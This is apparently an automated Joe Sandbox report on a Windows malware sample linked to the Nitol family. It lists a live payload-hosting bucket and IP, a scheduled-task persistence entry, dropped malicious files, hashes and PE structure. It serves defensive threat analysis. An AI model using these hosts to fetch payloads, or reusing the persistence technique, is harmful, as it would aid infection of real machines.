https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif& | 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.symauth.com/cps0( | WMZOAN.exe.0.dr | false | | high
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifR | 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 189atohci.sys.0.dr, WMZOAN.exe.0.dr | false | | high
https://airsdk.harman.com/runtime | 2362476847-83854387.07.exe | false | | high
http://www.symauth.com/rpa00 | WMZOAN.exe.0.dr | false | | high
https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif. | 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://a8mw1y.oss-cn-beijing.aliyuncs.com/ | 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://a8mw1y.oss-cn-beijing.aliyuncs.com/7-2476756634-1003f | 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://a8mw1y.oss-cn-beijing.aliyuncs.com/rt | 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifJ | 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://a8mw1y.oss-cn-beijing.aliyuncs.com/tt | 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://airsdk.harman.com/runtime.kernel32.dll | 2362476847-83854387.07.exe | false | | high
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifcom | 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
59.110.190.44 | a8mw1y.oss-cn-beijing.aliyuncs.com | China | | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1586429
Start date and time:2025-01-09 04:26:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 34s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:2362476847-83854387.07.exe
Detection:MAL
Classification:mal80.evad.winEXE@2/12@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 74%
• Number of executed functions: 6
• Number of non-executed functions: 105
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:02:09 | Task Scheduler | Run new task: xANIa path: C:\Users\user\Documents\WMZOAN.exe
22:27:07 | API Interceptor | 941x Sleep call for process: 2362476847-83854387.07.exe modified
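Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
59.110.190.44 | 2o63254452-763487230.06.exe | Get hash | malicious | Nitol | Browse |
59.110.190.44 | 2o63254452-763487230.06.exe | Get hash | malicious | Unknown | Browse |
59.110.190.44 | e2664726330-76546233.05.exe | Get hash | malicious | Nitol | Browse |
59.110.190.44 | e2664726330-76546233.05.exe | Get hash | malicious | Unknown | Browse |

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a8mw1y.oss-cn-beijing.aliyuncs.com | 2o63254452-763487230.06.exe | Get hash | malicious | Nitol | Browse | 59.110.190.44
a8mw1y.oss-cn-beijing.aliyuncs.com | 2o63254452-763487230.06.exe | Get hash | malicious | Unknown | Browse | 59.110.190.44

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | 2o63254452-763487230.06.exe | Get hash | malicious | Nitol | Browse | 118.178.60.9
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | 2o63254452-763487230.06.exe | Get hash | malicious | Unknown | Browse | 59.110.190.44
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | phish_alert_sp2_2.0.0.0 (1).eml | Get hash | malicious | Unknown | Browse | 47.111.150.42
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | e2664726330-76546233.05.exe | Get hash | malicious | Nitol | Browse | 118.178.60.9
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | e2664726330-76546233.05.exe | Get hash | malicious | Unknown | Browse | 59.110.190.44
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | miori.m68k.elf | Get hash | malicious | Unknown | Browse | 8.138.112.162
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | sora.ppc.elf | Get hash | malicious | Unknown | Browse | 8.151.21.103
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | sora.spc.elf | Get hash | malicious | Mirai | Browse | 120.78.217.242
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | sora.arm7.elf | Get hash | malicious | Mirai | Browse | 8.152.213.68
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | sora.mips.elf | Get hash | malicious | Mirai | Browse | 139.244.36.195

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37f463bf4616ecd445d4a1937da06e19 | 2o63254452-763487230.06.exe | Get hash | malicious | Nitol | Browse | 59.110.190.44
37f463bf4616ecd445d4a1937da06e19 | 2o63254452-763487230.06.exe | Get hash | malicious | Unknown | Browse | 59.110.190.44
37f463bf4616ecd445d4a1937da06e19 | https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwE | Get hash | malicious | Unknown | Browse | 59.110.190.44
37f463bf4616ecd445d4a1937da06e19 | z58Swiftcopy_MT.bat.exe | Get hash | malicious | Remcos, GuLoader | Browse | 59.110.190.44
37f463bf4616ecd445d4a1937da06e19 | HVSU7GbA5N.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 59.110.190.44
37f463bf4616ecd445d4a1937da06e19 | D7VRkhOECq.exe | Get hash | malicious | GuLoader | Browse | 59.110.190.44
37f463bf4616ecd445d4a1937da06e19 | KO0q4biYfC.exe | Get hash | malicious | Remcos, GuLoader | Browse | 59.110.190.44
37f463bf4616ecd445d4a1937da06e19 | DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | Get hash | malicious | Remcos, GuLoader | Browse | 59.110.190.44
37f463bf4616ecd445d4a1937da06e19 | e2664726330-76546233.05.exe | Get hash | malicious | Nitol | Browse | 59.110.190.44

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\Documents\WMZOAN.exe | 2o63254452-763487230.06.exe | Get hash | malicious | Nitol | Browse |
C:\Users\user\Documents\WMZOAN.exe | 2o63254452-763487230.06.exe | Get hash | malicious | Unknown | Browse |
C:\Users\user\Documents\WMZOAN.exe | e2664726330-76546233.05.exe | Get hash | malicious | Nitol | Browse |
C:\Users\user\Documents\WMZOAN.exe | e2664726330-76546233.05.exe | Get hash | malicious | Unknown | Browse |
C:\Users\user\Documents\WMZOAN.exe | 23567791246-764698008.02.exe | Get hash | malicious | Unknown | Browse |
C:\Users\user\Documents\WMZOAN.exe | 287438657364-7643738421.08.exe | Get hash | malicious | Nitol | Browse |
C:\Users\user\Documents\WMZOAN.exe | 287438657364-7643738421.08.exe | Get hash | malicious | Unknown | Browse |
C:\Users\user\Documents\WMZOAN.exe | 2749837485743-7684385786.05.exe | Get hash | malicious | Nitol | Browse |
C:\Users\user\Documents\WMZOAN.exe | 2749837485743-7684385786.05.exe | Get hash | malicious | Unknown | Browse |
C:\Users\user\Documents\WMZOAN.exe | 2b687482300.6345827638.08.exe | Get hash | malicious | Unknown | Browse |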
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                            Category:dropped
                                            Size (bytes):10681
                                            Entropy (8bit):7.866148090449211
                                            Encrypted:false
                                            SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                            MD5:10A818386411EE834D99AE6B7B68BE71
                                            SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                            SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                            SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                            Category:dropped
                                            Size (bytes):3892010
                                            Entropy (8bit):7.995495589600101
                                            Encrypted:true
                                            SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                            MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                            SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                            SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                            SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):5.3013015844763345
                                            Encrypted:false
                                            SSDEEP:6:WetLMBui9QCrztE+CrCa2BIDR6Ye89r7OdUzW9E40/qcX:2BuUQCrztEJMBIDRFgUzWg3
                                            MD5:C3BE870A726F627202B33B6AAD385CC2
                                            SHA1:CA594F5841AAEC1E2A765F4CE1FACA56DF0F3741
                                            SHA-256:F3E55A5CDCA6DB81E9FE1B1321174D057F6967382ACF98162C0DFE877AA78269
                                            SHA-512:926DFAA48EF276776143B35C188130E0FB69C6A68DB7737024AC009C3E4348C7976D464F48A11C7A7396A8CABD0EEA9420FF6AAA49657B1A790DB77E4BAF79DB
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                            Category:dropped
                                            Size (bytes):125333
                                            Entropy (8bit):7.993522712936246
                                            Encrypted:true
                                            SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                            MD5:2CA9F4AB0970AA58989D66D9458F8701
                                            SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                            SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                            SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                            Category:dropped
                                            Size (bytes):8299
                                            Entropy (8bit):7.9354275320361545
                                            Encrypted:false
                                            SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                            MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                            SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                            SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                            SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                            Category:dropped
                                            Size (bytes):135589
                                            Entropy (8bit):7.995304392539578
                                            Encrypted:true
                                            SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                            MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                            SHA1:561836F6228E24180238DF9456707A2443C5795C
                                            SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                            SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):28272
                                            Entropy (8bit):7.7114959549251045
                                            Encrypted:false
                                            SSDEEP:384:91egCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQi:m5F1FUdy422IK+gAZt2i0YPpQn4GMd
                                            MD5:B2F6434FC09C8461DE3CEAEE40EAF4AC
                                            SHA1:700D5D9D537EA474E3FC65EE1E963797B0219079
                                            SHA-256:8FEFF2CE88FEFDD30A3D6041E64DA9A19256AF5CF0CA9D479C040E79F4B2698B
                                            SHA-512:1F70B25D408F92E07760AA0DB92DC36F396985457E343823382E7397280B6AFA2C1BB1870976D5E179FF17345F59086F77EA896D3DF918B1E42265B2ED31A4E0
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):3889557
                                            Entropy (8bit):7.9999387567935285
                                            Encrypted:true
                                            SSDEEP:98304:FAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:andLOZS/DtpPJRO8OHBL4f2UQI+A
                                            MD5:DE044C481A72F459A1FCB638B4E59263
                                            SHA1:5B49B9A644CC9AC381837E05FC86F0BA7020F728
                                            SHA-256:52A1541218DAB5A01C2B7F1C45B808807408A7D1F46185503B2A573BB2C00EF2
                                            SHA-512:DC9AA75D4282EA3120D5C3A36693765A1B187DF25839065B6F83F9B15AC8D820F237DC2D373DCB3D3D90578F8579DBF20792494248947988D9702C02A16BE1B7
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):133136
                                            Entropy (8bit):6.350273548571922
                                            Encrypted:false
                                            SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                            MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                            SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                            SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                            SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: 2o63254452-763487230.06.exe, Detection: malicious
                                            • Filename: e2664726330-76546233.05.exe, Detection: malicious
                                            • Filename: 23567791246-764698008.02.exe, Detection: malicious
                                            • Filename: 287438657364-7643738421.08.exe, Detection: malicious
                                            • Filename: 2749837485743-7684385786.05.exe, Detection: malicious
                                            • Filename: 2b687482300.6345827638.08.exe, Detection: malicious
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:GIF image data, version 89a, 10 x 10
                                            Category:dropped
                                            Size (bytes):8228
                                            Entropy (8bit):7.9789605513811654
                                            Encrypted:false
                                            SSDEEP:192:YBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:YBuNhyTlBU2dp+1XrBuCgp9vU0l
                                            MD5:1F36B38FACAE47A47B2D606E3D1EB4B6
                                            SHA1:C3D397E45DC42BDF67A6590749BCEC04DE67E187
                                            SHA-256:EF40FA26DEDB9515EDCA4C6B511579567B1D7E000E607948E645B6457F1CB113
                                            SHA-512:5169619B27240BFDCC02D48C914CCA67928C2F79A2DFB49934EBE308E066F38A8B90DCDCB2CF0D7D2F73432FC83A2A104C7F00B0B44FFC12D0B348E6AAE90576
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):122880
                                            Entropy (8bit):6.0020643721575455
                                            Encrypted:false
                                            SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FH:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gH
                                            MD5:2CC19F28DF5C94B11F7F75F5F0ECDE71
                                            SHA1:26B7C27E689B60560EACCB6C28A6825089397602
                                            SHA-256:CAA6681AA62395BFBCFFE13DBFECC824F700268A0803B630CE3DA29115B46D46
                                            SHA-512:B9A8185F6AF08AD9445E53400E5C176809D9219EEA67DC28C4E98D20749C0CB27D06E7ACBBD7791C9AC0829DD7BFC30967A87CB521C50F1C9FA9A374FF6A399A
                                            Malicious:true
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):28272
                                            Entropy (8bit):6.229014462083437
                                            Encrypted:false
                                            SSDEEP:384:53YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/B:5OUkgfdZ9pRyv+uPzCMHo3q4tDgh7
                                            MD5:915805D845828024619E64F348F57074
                                            SHA1:5853BE1813BE2BEDB6D4369283EF972612CB6A8F
                                            SHA-256:778400920B9E21AB56EBFCAE927D3E3A97C34B34C7BDA55D70A686609F14E471
                                            SHA-512:83847A53835A43A0E38E4395E653F1DF6B2AEEA113AD558C6FB527315A5247D625D1039991CC921DD4C16398C45A5CB146EAF52C0E77E497BC29BE1FE9607E43
                                            Malicious:true
                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Entropy (8bit):0.10677252461277925
                                            TrID:
                                            • Win64 Executable GUI (202006/5) 92.65%
                                            • Win64 Executable (generic) (12005/4) 5.51%
                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                            • DOS Executable Generic (2002/1) 0.92%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:2362476847-83854387.07.exe
                                            File size:30'958'080 bytes
                                            MD5:d7fbf8a45ea736f05b15de0c985b343d
                                            SHA1:f988e97b3d3a4ab12cc09c73f61f1036c133ac4d
                                            SHA256:889d53f0805721fc02707b8eceadf846274e7e427620e2dda8b7d86c29f034e8
                                            SHA512:ee99d7386709e2b36b13257fb2d5e47ffa64b5a18d1042fed6b0790699e2c4492569e8382901f9234917c56d21c4ac8d472f5a977f040672717ae537fc944284
                                            SSDEEP:3072:rgT9K9c5vw5RbJMyBcL7J67MQoMWiRwS+PZGyuoHo7PaMJ5Hy7Yvi7:rS9Uh5JjBcXo7WngyuiozzY
                                            TLSH:0C6706C622A820E9E0668E358D656501CB76BC33DEE0579F47D5328DCFFA6D08D27B21
                                            Icon Hash:33618a9a8ecc6113
                                            Entrypoint:0x140004660
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x140000000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, GUARD_CF, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66D58989 [Mon Sep 2 09:46:49 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:0
                                            File Version Major:6
                                            File Version Minor:0
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:0
                                            Import Hash:089ce9b8524e1005a0be3b5c104cbdc2
                                            Instruction
                                            dec eax
                                            sub esp, 28h
                                            call 00007F5EA87E1638h
                                            dec eax
                                            add esp, 28h
                                            jmp 00007F5EA87DDD83h
                                            int3
                                            int3
                                            dec eax
                                            sub esp, 28h
                                            call 00007F5EA87E1BE4h
                                            test eax, eax
                                            je 00007F5EA87E13A3h
                                            dec eax
                                            mov eax, dword ptr [00000030h]
                                            dec eax
                                            mov ecx, dword ptr [eax+08h]
                                            jmp 00007F5EA87E1387h
                                            dec eax
                                            cmp ecx, eax
                                            je 00007F5EA87E1396h
                                            xor eax, eax
                                            dec eax
                                            cmpxchg dword ptr [00015498h], ecx
                                            jne 00007F5EA87E1370h
                                            xor al, al
                                            dec eax
                                            add esp, 28h
                                            ret
                                            mov al, 01h
                                            jmp 00007F5EA87E1379h
                                            int3
                                            int3
                                            int3
                                            inc eax
                                            push ebx
                                            dec eax
                                            sub esp, 20h
                                            movzx eax, byte ptr [000154B3h]
                                            test ecx, ecx
                                            mov ebx, 00000001h
                                            cmove eax, ebx
                                            mov byte ptr [000154A3h], al
                                            call 00007F5EA87E19C7h
                                            call 00007F5EA87E1D9Ah
                                            test al, al
                                            jne 00007F5EA87E1386h
                                            xor al, al
                                            jmp 00007F5EA87E1396h
                                            call 00007F5EA87E3B71h
                                            test al, al
                                            jne 00007F5EA87E138Bh
                                            xor ecx, ecx
                                            call 00007F5EA87E1DB6h
                                            jmp 00007F5EA87E136Ch
                                            mov al, bl
                                            dec eax
                                            add esp, 20h
                                            pop ebx
                                            ret
                                            int3
                                            int3
                                            int3
                                            dec eax
                                            mov dword ptr [esp+08h], ebx
                                            push ebp
                                            dec eax
                                            mov ebp, esp
                                            dec eax
                                            sub esp, 40h
                                            mov ebx, ecx
                                            cmp ecx, 01h
                                            ja 00007F5EA87E142Ch
                                            call 00007F5EA87E1B48h
                                            test eax, eax
                                            je 00007F5EA87E13ADh
                                            test ebx, ebx
                                            jne 00007F5EA87E13A9h
                                            dec eax
                                            lea ecx, dword ptr [00015418h]
                                            Programming Language:
                                            • [RES] VS2015 UPD3 build 24213
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x17e20 | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17eac | 0x64 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1d75000 | 0x14ae4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1d74000 | 0xc0c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1d8a000 | 0x688 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x16fc0 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x17030 | 0x94 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xe000 | 0x268 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xcf7e | 0xd000 | dc0e496cc62a72841a0f6eed3d85213d | False | 0.5729041466346154 | zlib compressed data | 6.352236690190385 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xe000 | 0xa70a | 0xa800 | ac98e728dcc5f02cfff40dd332b9966a | False | 0.41785249255952384 | data | 4.750739758604996 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x19000 | 0x1d5ad20 | 0x1d58400 | cfaccd625cbd4e03f86b1c9b77242af8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1d74000 | 0xc0c | 0xe00 | 0c591ba9e353c9ded8d5ff8e8f0bef93 | False | 0.4193638392857143 | data | 4.2782412766768365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x1d75000 | 0x14ae4 | 0x14c00 | 7a8b0f70e135a8d2081018975a06b968 | False | 0.07067724021084337 | data | 2.670291778313336 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1d8a000 | 0x688 | 0x800 | 825b80d9b29cec6ca30f892061443ec3 | False | 0.55322265625 | data | 4.9083931410179265 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1d751c0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.12095435684647303
RT_ICON | 0x1d77768 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | | | 0.04467348870223589
RT_ICON | 0x1d87f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.18409943714821764
RT_ICON | 0x1d89038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.2925531914893617
RT_GROUP_ICON | 0x1d894a0 | 0x3e | data | | | 0.8870967741935484
RT_VERSION | 0x1d894e0 | 0x2cc | data | | | 0.4511173184357542
RT_MANIFEST | 0x1d897ac | 0x336 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (762), with CRLF line terminators | English | United States | 0.5048661800486618
DLL | Import
